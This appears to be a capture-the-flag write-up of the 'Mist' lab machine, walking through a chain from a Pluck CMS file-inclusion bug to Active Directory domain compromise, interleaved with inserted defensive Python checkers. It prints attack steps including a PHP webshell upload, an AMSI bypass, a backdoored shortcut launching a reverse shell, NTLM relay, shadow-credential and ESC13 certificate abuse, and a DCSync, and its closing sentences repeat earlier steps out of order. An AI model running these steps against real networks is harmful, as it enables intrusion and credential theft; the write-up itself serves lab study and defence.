Mist is an Insane-difficulty machine that provides a comprehensive scenario for exploiting various misconfigurations and vulnerabilities in an Active Directory (AD) environment. The machine has multiple layers, starting with a public-facing CMS running on Apache with a path traversal vulnerability, allowing us to retrieve a backup file containing hashed credentials. Cracking this hash grants initial access as a low-privileged web user. Exploiting file-write permissions on a shared directory further elevates our access by allowing a reverse shell connection as another domain user. From there, enumeration reveals several AD misconfigurations, including LDAP signing disabled, WebDAV exploitation, and misconfigurations in ADCS templates, each step designed to escalate privileges through different AD entities. The final exploit involves creating shadow credentials to acquire the machine account’s NTLM hash, enabling a DCSync attack to obtain the Domain Administrator hash.
Enumeration
Nmap Scan
nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
80/tcp open http
nmap -sCV -p80 $ip -Pn -oN Nmap/Script-scan
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
HTTP
http://10.10.11.17?file=mist
When I clicked the "admin" link, I was redirected to this login page.
The Pluck version is 4.7.18. A quick search for this version on exploit-db leads to this CVE, but I don't have the admin password yet.
After a deeper search for other Pluck CVEs, I found an unauthenticated LFI.
Vulnerability Details
When I included admin_backup.php, I got a hash, so I will try to crack it
On https://crackstation.net/, I was able to crack it
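The file-inclusion bug above exists because a user-controlled file name is joined onto a directory without checking where the result ends up. The resolver below is an added example written for this writeup (not Pluck's code and not the author's): it normalises the requested path, follows symlinks, and refuses anything that lands outside the base directory. The base directory and the traversal string in the test are constructed to mirror the paths mentioned in the post.

```python
from pathlib import Path


def resolve_under(base_dir: str, user_path: str) -> Path:
    """Return the real path of user_path inside base_dir, or raise PermissionError.

    Rejects NUL bytes, absolute paths and any '..' sequence that escapes base_dir.
    """
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")  # classic truncation trick in older PHP/C code
    if Path(user_path).is_absolute():
        raise PermissionError("absolute paths are not allowed")
    base = Path(base_dir).resolve()
    # resolve() collapses '..' segments and follows symlinks, so the containment
    # check is done on the real location, not on the text the client supplied.
    candidate = (base / user_path).resolve()
    if candidate != base and base not in candidate.parents:
        raise PermissionError(f"{user_path!r} escapes {base_dir}")
    return candidate


def is_safe(base_dir: str, user_path: str) -> bool:
    """Convenience wrapper: True when the request stays inside base_dir."""
    try:
        resolve_under(base_dir, user_path)
        return True
    except (PermissionError, ValueError):
        return False


if __name__ == "__main__":
    # Constructed base directory modelled on the albums module path from the post.
    base = "/var/www/pluck/data/modules/albums"
    for req in ("cats.png", "../../settings/modules/albums/admin_backup.php", "/etc/passwd"):
        print(f"{req!r:55} -> {'allowed' if is_safe(base, req) else 'blocked'}")
```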
Initial Access
When I used the cracked password to log in as admin, I was redirected to the admin portal
Now that I have the admin password, I can get RCE via the CVE found earlier.
I read the exploit and decided to perform it manually rather than using the PoC.
First, go to http://10.10.11.17/admin.php?action=installmodule
zip module.zip p0wny.php
Finally, access the webshell at http://10.10.11.17/data/modules/module/p0wny.php
Lateral Movement
Looking at the internal listening ports, RPC, SMB, and WinRM are all open, which confirms that firewall rules block most inbound connections to MS01.
I want to find a possible escalation path on MS01, so I uploaded winPEAS.ps1 and PowerUp.ps1 to the box, but since AV is enabled, I had to bypass AMSI first.
I created bypass.ps1 containing a common AMSI bypass (patching AmsiScanBuffer), then loaded the PowerUp.ps1 script.
Unfortunately, I didn't find any exploitation path with PowerUp, but under C:\ there is an uncommon folder:
JokerShell C:\> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/10/2024 1:50 AM Common Applications
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 2/20/2024 5:44 AM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 2/21/2024 12:37 PM Users
d----- 3/26/2024 12:02 PM Windows
d----- 3/10/2024 3:21 AM xampp
JokerShell C:\Common Applications> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/8/2021 1:15 AM 1118 Calculator.lnk
-a---- 5/7/2021 3:14 PM 1175 Notepad.lnk
-a---- 5/7/2021 3:15 PM 1171 Wordpad.lnk
They are .lnk files to execute common programs on the system.
JokerShell C:\Common Applications> type Calculator.lnk
(binary .lnk content; the readable strings are %SystemRoot%\system32\shell32.dll,-22531 and %windir%\system32\win32calc.exe)
What if I can overwrite one of them so that it executes a reverse shell when someone uses it? First, I need to check my permissions over this folder.
JokerShell C:\> icacls 'Common Applications'
Common Applications NT AUTHORITY\SYSTEM:(OI)(CI)(F)
MS01\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(RX,W)
From the output above, BUILTIN\Users has write access on the folder (RX,W).
On my Windows host, I created a new shortcut.
In the Target field, I put this payload; rev.ps1 contains an encoded reverse shell.
Make sure you're in C:\xampp\htdocs because it's excluded from Defender.
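The icacls check above is exactly what a defender should run across shared folders: a directory of shortcuts writable by BUILTIN\Users is an ACL weakness, whatever the shortcuts point to. The script below is an added example (not from the post or any tool it mentions) that parses icacls output and flags ACEs where a low-privilege principal holds a write-type right. The sample output is the one shown above, embedded as a constructed string; the principal and right lists are my own choices.

```python
import re

# Principals that every domain user effectively belongs to. Write access for
# any of these makes the folder writable by the whole user population.
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}
# icacls simple (F, M, W) and specific (WD, AD, ...) rights that allow changing contents.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "DC", "D", "WDAC", "WO"}
INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I"}

ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(path: str, output: str):
    """Parse `icacls <path>` output into a list of (principal, rights-set, is_deny).

    icacls prints the path in front of the first ACE, so the caller passes the
    path it queried and we strip it from that line.
    """
    aces = []
    first = True
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if first and line.startswith(path):
            line = line[len(path):].strip()
        first = False
        m = ACE_RE.match(line)
        if not m:
            continue
        tokens = []
        for group in re.findall(r"\(([^)]*)\)", m.group("rights")):
            tokens.extend(t.strip() for t in group.split(","))
        is_deny = "DENY" in tokens
        rights = {t for t in tokens if t and t not in INHERITANCE_FLAGS and t != "DENY"}
        aces.append((m.group("principal").strip(), rights, is_deny))
    return aces


def find_weak_aces(path: str, output: str):
    """Return [(principal, sorted write rights)] for allow-ACEs granting writes to low-priv principals."""
    weak = []
    for principal, rights, is_deny in parse_icacls(path, output):
        if is_deny or principal not in LOW_PRIV_PRINCIPALS:
            continue
        granted = sorted(rights & WRITE_RIGHTS)
        if granted:
            weak.append((principal, granted))
    return weak


# Constructed sample: the icacls output shown in the post, reproduced verbatim.
SAMPLE_OUTPUT = """Common Applications NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
                    MS01\\Administrator:(OI)(CI)(F)
                    BUILTIN\\Administrators:(OI)(CI)(F)
                    BUILTIN\\Users:(OI)(CI)(RX,W)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for principal, rights in find_weak_aces("Common Applications", SAMPLE_OUTPUT):
        print(f"[!] {principal} can write to 'Common Applications' via {','.join(rights)}")
```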
After pivoting, I can run Nmap and see the results:
nmap -iL ip.txt -F -Pn
Nmap scan report for 192.168.100.100
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
Nmap scan report for 192.168.100.101
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
Looking for remote management ports, I found WinRM running on both hosts.
nmap -iL ip.txt -p5985,3389,5986 --open
Nmap scan report for 192.168.100.100
PORT STATE SERVICE
5985/tcp open wsman
Nmap scan report for 192.168.100.101
PORT STATE SERVICE
5985/tcp open wsman
Script scan for the DC
nmap -sCV -p53,88,135,139,389,445,5985 192.168.100.100 -oN Nmap/dc-scan
Nmap scan report for 192.168.100.100
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-08 20:46:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mist.htb0., Site: Default-First-Site-Name)
| Subject Alternative Name: DNS:DC01.mist.htb
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
I will add the two machines to my /etc/hosts file
echo '192.168.100.100 dc01 dc01.mist.htb mist.htb' | sudo tee -a /etc/hosts
echo '192.168.100.101 ms01 ms01.mist.htb' | sudo tee -a /etc/hosts
My next move is to enumerate both the shared folders and the domain ACLs with BloodHound, so I will upload SharpHound.exe to the host and begin the collection.
I still couldn't access the shared folders without credentials.
I already know what to do, so I will proceed directly with these steps:
Check if WebDAV (the WebClient service) is running
If WebDAV is not running, try to enable it
Use any coercion method (PrinterBug, PetitPotam, Coercer, etc.) to force the machine to authenticate to my host
Set up a relay agent on my host to relay the authentication coming from HTTP (WebDAV) to LDAP and perform RBCD or a Shadow Credentials attack
Performing RBCD depends on having an account with an SPN or the ability to create a machine account, while Shadow Credentials depends on PKINIT authentication (usually available when ADCS is installed).
When I enumerated the domain to see whether I can add a computer account, I found ms-DS-MachineAccountQuota set to zero, so I can't.
Enumerating further, I found that msDS-KeyCredentialLink contains a value, so a Shadow Credentials attack is possible.
Now, let's deal with WebDAV. I downloaded SharpWebClientScanner.exe to query its status, but I didn't find it running on any host, so I have to enable it manually.
JokerShell C:\xampp\htdocs> .\SharpWebClientScanner.exe --domain mist.htb
By Mor David
[x] Unable to reach DAV pipe on MS01, system is either unreachable or does not have WebClient service running
[x] Unable to reach DAV pipe on DC01, system is either unreachable or does not have WebClient service running
[x] Unable to reach DAV pipe on svc_ca, system is either unreachable or does not have WebClient service running
JokerShell C:\xampp\htdocs> .\EtwStartWebClient.exe
[+] WebClient Service started successfully
Now I need to use a coercion method, but that requires credentials. I only have a shell as the domain user brandon.keywarp, with no password or hash.
There is one way to get the user's hash: use an ADCS template to request a certificate for the user and recover their NT hash with it.
With Certipy, I can authenticate to the domain and get the hash
certipy-ad auth -pfx cert.pfx -domain mist.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: brandon.keywarp@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'brandon.keywarp.ccache'
[*] Trying to retrieve NT hash for 'brandon.keywarp'
[*] Got hash for 'brandon.keywarp@mist.htb': aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1xxxxxxxxxxx
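The msDS-KeyCredentialLink value mentioned above is what a Shadow Credentials attack writes to, so an auditor wants to be able to read it: which accounts carry entries, when each key was created, and which device it claims to belong to. The decoder below is an added example written for this writeup (not Certipy's, pywhisker's or the post author's code). It follows the KEYCREDENTIALLINK_BLOB layout from MS-ADTS (a 4-byte version 0x200 followed by length/identifier/value entries) wrapped in the DN-Binary string form LDAP returns. The blob it parses is constructed in the script itself with the `build_blob` helper; the device GUID, timestamp and DN are made-up sample values.

```python
import struct
import uuid
from datetime import datetime, timedelta, timezone

KCL_VERSION = 0x00000200
# Entry identifiers from MS-ADTS 2.2.20.6 KEYCREDENTIALLINK_ENTRY.
ENTRY_NAMES = {
    0x01: "KeyID", 0x02: "KeyHash", 0x03: "KeyMaterial", 0x04: "KeyUsage",
    0x05: "KeySource", 0x06: "DeviceId", 0x07: "CustomKeyInformation",
    0x08: "KeyApproximateLastLogonTimeStamp", 0x09: "KeyCreationTime",
}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME (100-ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    return int((dt - FILETIME_EPOCH).total_seconds()) * 10_000_000


def parse_dn_binary(value: str):
    """Split 'B:<hex char count>:<hex>:<DN>' into (blob bytes, DN)."""
    parts = value.split(":", 3)
    if len(parts) != 4 or parts[0] != "B":
        raise ValueError("not a DN-Binary value")
    _, count, hexdata, dn = parts
    if int(count) != len(hexdata):
        raise ValueError("DN-Binary length field does not match payload")
    return bytes.fromhex(hexdata), dn


def parse_blob(blob: bytes) -> dict:
    """Walk the entry list and return {entry name: raw value bytes}."""
    if len(blob) < 4:
        raise ValueError("blob too short")
    version = struct.unpack_from("<I", blob, 0)[0]
    if version != KCL_VERSION:
        raise ValueError(f"unsupported KeyCredentialLink version 0x{version:x}")
    entries, offset = {}, 4
    while offset < len(blob):
        if offset + 3 > len(blob):
            raise ValueError("truncated entry header")
        length, ident = struct.unpack_from("<HB", blob, offset)
        offset += 3
        value = blob[offset:offset + length]
        if len(value) != length:
            raise ValueError("truncated entry value")
        offset += length
        entries[ENTRY_NAMES.get(ident, f"Unknown-0x{ident:02x}")] = value
    return entries


def describe_link(dn_binary: str) -> dict:
    """Summarise one msDS-KeyCredentialLink value for an audit report."""
    blob, dn = parse_dn_binary(dn_binary)
    e = parse_blob(blob)
    info = {"dn": dn, "entries": sorted(e)}
    if "DeviceId" in e:
        info["device_id"] = str(uuid.UUID(bytes_le=e["DeviceId"]))
    if "KeyCreationTime" in e:
        info["created"] = filetime_to_datetime(struct.unpack("<Q", e["KeyCreationTime"])[0])
    if "KeyUsage" in e:
        info["key_usage"] = e["KeyUsage"][0]  # 0x01 = NGC (Windows Hello / PKINIT key)
    return info


def build_blob(entries) -> bytes:
    """Serialise [(identifier, value bytes)] into a blob; used only to build the sample."""
    out = struct.pack("<I", KCL_VERSION)
    for ident, value in entries:
        out += struct.pack("<HB", len(value), ident) + value
    return out


def to_dn_binary(blob: bytes, dn: str) -> str:
    h = blob.hex().upper()
    return f"B:{len(h)}:{h}:{dn}"


# Constructed sample (hypothetical GUID, time and DN; not values from the lab).
SAMPLE_DEVICE = uuid.UUID("0f2c4b8e-5d61-4a6f-9c3a-1b2c3d4e5f60")
SAMPLE_CREATED = datetime(2024, 3, 10, 1, 50, tzinfo=timezone.utc)
SAMPLE_LINK = to_dn_binary(build_blob([
    (0x01, bytes(32)),                       # KeyID placeholder (SHA-256 of the key)
    (0x03, bytes(16)),                       # KeyMaterial placeholder
    (0x04, b"\x01"),                         # KeyUsage = NGC
    (0x05, b"\x00"),                         # KeySource = AD
    (0x06, SAMPLE_DEVICE.bytes_le),          # DeviceId GUID in little-endian field order
    (0x09, struct.pack("<Q", datetime_to_filetime(SAMPLE_CREATED))),
]), "CN=MS01,CN=Computers,DC=mist,DC=htb")

if __name__ == "__main__":
    for k, v in describe_link(SAMPLE_LINK).items():
        print(f"{k:12} {v}")
```

In a real audit you would feed every msDS-KeyCredentialLink value returned by an LDAP search into `describe_link` and review entries on computer and service accounts that never enrol a Windows Hello key, paying attention to the creation time.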
For WebDAV to function, it needs a hostname to connect to, but my host isn't accessible from the internal network, so I will add a port-forwarding rule so that any connection to ms01 on port 8888 is forwarded to port 80 on my host.
[Agent : MIST\Brandon.Keywarp@MS01] » listener_add --addr 0.0.0.0:8888 --to 0.0.0.0:80 --tcp
INFO[8701] Listener 0 created on remote agent!
certipy-ad cert -export -pfx /home/kali/vault/Hacking/Mist/impacket/e1LybMof.pfx -password 'y5hd2VIzZgXcGREYy0uJ' -out cert.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing PFX to 'cert.pfx'
Authenticate to the DC using the certificate and get NT hash of the computer account.
certipy-ad auth -pfx cert.pfx -domain mist.htb -username 'MS01$' -dc-ip 192.168.100.100
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: ms01$@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ms01.ccache'
[*] Trying to retrieve NT hash for 'ms01$'
[*] Got hash for 'ms01$@mist.htb': aad3b435b51404eeaad3b435b51404ee:17749fa7409ac85c4zzzzzzzzzzzz
With the computer account hash, I can create a Silver Ticket to access the file system as an administrator.
The .kdbx file is certainly a KeePass database, so it will be protected by a password.
Cats.png contains nothing but cat images.
image_200222024.png has something interesting:
A string that's been partially hidden and encoded using base64
UA7cpa[#1!_*ZX
I will try it against the KeePass hash, but I think I will need a brute-force attack with hashcat. First, get the hash of the KeePass database:
keepass2john sharon.kdbx > keepass.hash
The input in the image was 15 characters and the string I have is 14, so I only need to append one ?a (hashcat's mask for any printable character).
SVC_CA$ can add KeyCredentialLink (Shadow Credential) to svc_cabackup
certipy-ad shadow auto -u 'svc_ca$@mist.htb' -hashes :09814d63c9baxxxxxxxxxxxx -account svc_cabackup
ESC13: If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.
From BloodHound I can see that, as a member of the Certificate Services group, I can abuse ESC13 and add myself or anyone I want to the Certificate Managers group.
The Certificate Managers group is a member of the CA Backup group.
A member of the CA Backup group can perform ESC13 too and gain membership in the Services Accounts group, which is a member of the Backup Operators group.
To summarize the attack path:
Perform ESC13 to inherit the privileges of the Certificate Managers group
Perform ESC13 again to inherit the privileges of the Services Accounts group
Inherit Backup Operators privileges by being in the Services Accounts group
Request a certificate for the vulnerable template managerauthentication
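The ESC13 definition and the chain above boil down to a graph question a defender can answer from LDAP data: which templates have an issuance policy whose OID object carries msDS-OIDToGroupLink, who can enrol in them, and where does group nesting carry that membership next? The script below is an added example for this writeup (not Certipy, BloodHound or the post author's tooling) that implements that check and then walks the chain to a fixpoint, so it reports the end state (Backup Operators) rather than only the first hop. The template, OID and group objects are constructed dictionaries; the group names follow the post, the OIDs and the second template name (`BackupAuthentication`) are invented placeholders.

```python
# EKUs that let a certificate be used to log on; a template with an OID group
# link but no authentication EKU cannot be used to claim the group at logon.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}


def find_esc13(templates, oids):
    """Return one finding per (template, issuance policy, enroller) that matches ESC13.

    templates: list of dicts with name, enabled, ekus, issuance_policies, enroll_principals
               (enroll_principals = principals holding the Enroll right in the template ACL)
    oids:      {policy OID: {"name": str, "group": linked group or None}} from the OID container
    """
    findings = []
    for t in templates:
        if not t["enabled"]:
            continue
        if t["ekus"] and not (set(t["ekus"]) & CLIENT_AUTH_EKUS):
            continue
        for policy in t["issuance_policies"]:
            linked_group = oids.get(policy, {}).get("group")
            if not linked_group:
                continue
            for principal in t["enroll_principals"]:
                findings.append({
                    "template": t["name"],
                    "policy": oids[policy].get("name", policy),
                    "enroller": principal,
                    "granted_group": linked_group,
                })
    return findings


def reachable_groups(start_groups, findings, nested_in):
    """Fixpoint over group nesting plus ESC13 grants: every group a principal
    holding start_groups can end up acting as."""
    reached = set(start_groups)
    changed = True
    while changed:
        changed = False
        for g in list(reached):
            for parent in nested_in.get(g, ()):
                if parent not in reached:
                    reached.add(parent)
                    changed = True
        for f in findings:
            if f["enroller"] in reached and f["granted_group"] not in reached:
                reached.add(f["granted_group"])
                changed = True
    return reached


# Constructed sample data modelled on the chain described in the post.
TEMPLATES = [
    {"name": "ManagerAuthentication", "enabled": True,
     "ekus": ["1.3.6.1.5.5.7.3.2"],
     "issuance_policies": ["1.3.6.1.4.1.311.21.8.999.1"],   # placeholder OID
     "enroll_principals": ["Certificate Services"]},
    {"name": "BackupAuthentication", "enabled": True,         # placeholder template
     "ekus": ["1.3.6.1.5.5.7.3.2"],
     "issuance_policies": ["1.3.6.1.4.1.311.21.8.999.2"],   # placeholder OID
     "enroll_principals": ["CA Backup"]},
    {"name": "WebServer", "enabled": True,                    # no auth EKU: not ESC13
     "ekus": ["1.3.6.1.5.5.7.3.1"],
     "issuance_policies": ["1.3.6.1.4.1.311.21.8.999.1"],
     "enroll_principals": ["Domain Users"]},
]
OIDS = {
    "1.3.6.1.4.1.311.21.8.999.1": {"name": "Manager Policy", "group": "Certificate Managers"},
    "1.3.6.1.4.1.311.21.8.999.2": {"name": "Backup Policy", "group": "Services Accounts"},
}
NESTED_IN = {                      # group -> groups it is a member of
    "Certificate Managers": ["CA Backup"],
    "Services Accounts": ["Backup Operators"],
}

if __name__ == "__main__":
    found = find_esc13(TEMPLATES, OIDS)
    for f in found:
        print(f"[ESC13] {f['enroller']} -> {f['template']} ({f['policy']}) grants {f['granted_group']}")
    print("reachable from Certificate Services:",
          sorted(reachable_groups({"Certificate Services"}, found, NESTED_IN)))
```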
Following this, I looked under the /data/settings/modules/albums folder and found admin_backup.php.
Second, create a zip file containing a PHP shell. I will use and upload it.
I will upgrade my shell with to get more flexibility, because the installed modules don't persist; maybe there is a background script removing them.
At this point, with a domain user, I have to pivot to enumerate the domain controller with
I haven't found anything useful so far, so there is an attack I have to try (NTLM relay to LDAP using WebDAV), and this post is useful for performing it:
I will use this to enable it from Windows.
First, upload to the machine and request a certificate for the current user.
Since we found earlier that MS01$ has a KeyCredentialLink value, we need a tool to clear it and add a new one; this is included in this version of ntlmrelayx.py after a new feature was added in this .